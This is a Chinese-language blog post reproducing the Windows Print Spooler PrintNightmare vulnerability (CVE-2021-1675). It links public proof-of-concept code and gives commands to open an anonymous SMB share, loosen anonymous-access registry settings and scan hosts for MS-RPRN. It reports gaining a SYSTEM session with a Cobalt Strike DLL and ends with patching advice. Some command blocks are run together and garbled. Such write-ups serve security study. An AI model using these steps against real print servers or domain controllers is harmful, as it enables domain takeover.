Windows Print Spooler CVE-2021-1675 漏洞复现

admin 2022年4月6日10:30:39评论90 views字数 1492阅读4分58秒阅读模式


1、漏洞描述


        Windows Print SpoolerWindows的打印机后台处理程序,广泛的应用于各种内网中。近期安全研究人员在Github公布了Windows PrintSpooler远程代码执行漏洞POC。攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序,若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。


        Github公布的地址:https://github.com/afwu/PrintNightmare


2、漏洞准备


        这里我们使用python版本的poc

        地址:https://github.com/cube0x0/CVE-2021-1675

        环境:win2016

        首先创建一个可以允许匿名访问的smb

        创建时使用powershell

mkdirC:shareicaclsC:share /T /grant Anonymous` logon:ricaclsC:share /T /grant Everyone:rNew-SmbShare-Path C:share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'REG ADD"HKLMSystemCurrentControlSetServicesLanManServerParameters" /vNullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existingNullSessionPipesREG ADD"HKLMSystemCurrentControlSetServicesLanManServerParameters" /vNullSessionShares /t REG_MULTI_SZ /d share /fREG ADD"HKLMSystemCurrentControlSetControlLsa" /v EveryoneIncludesAnonymous/t REG_DWORD /d 1 /fREG ADD"HKLMSystemCurrentControlSetControlLsa" /v RestrictAnonymous /tREG_DWORD /d 0 /f# Reboot


Windows Print Spooler CVE-2021-1675 漏洞复现


3、漏洞利用


        在运行漏洞利用之前,您需要安装Impacket 版本


pip3 uninstall impacketgit clone https://github.com/cube0x0/impacketcd impacketpython3 ./setup.py install

 

        可以使用rpcdump.py来扫描潜在的易受攻击的主机,如果它返回一个值,它可能是易受攻击的


rpcdump.py @192.168.1.10 | grep MS-RPRN


协议:[MS-RPRN]:打印系统远程协议


Windows Print Spooler CVE-2021-1675 漏洞复现


 

然后进行利用,这里使用dll是cs生成的dll


Windows Print Spooler CVE-2021-1675 漏洞复现


返回了system的会话


Windows Print Spooler CVE-2021-1675 漏洞复现


4、修复建议


        安装微软 CVE-2021-1675 漏洞补丁

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675

        关闭打印机服务

 


本文始发于微信公众号(Khan安全攻防实验室):Windows Print Spooler CVE-2021-1675 漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月6日10:30:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Windows Print Spooler CVE-2021-1675 漏洞复现http://cn-sec.com/archives/534452.html

发表评论

匿名网友 填写信息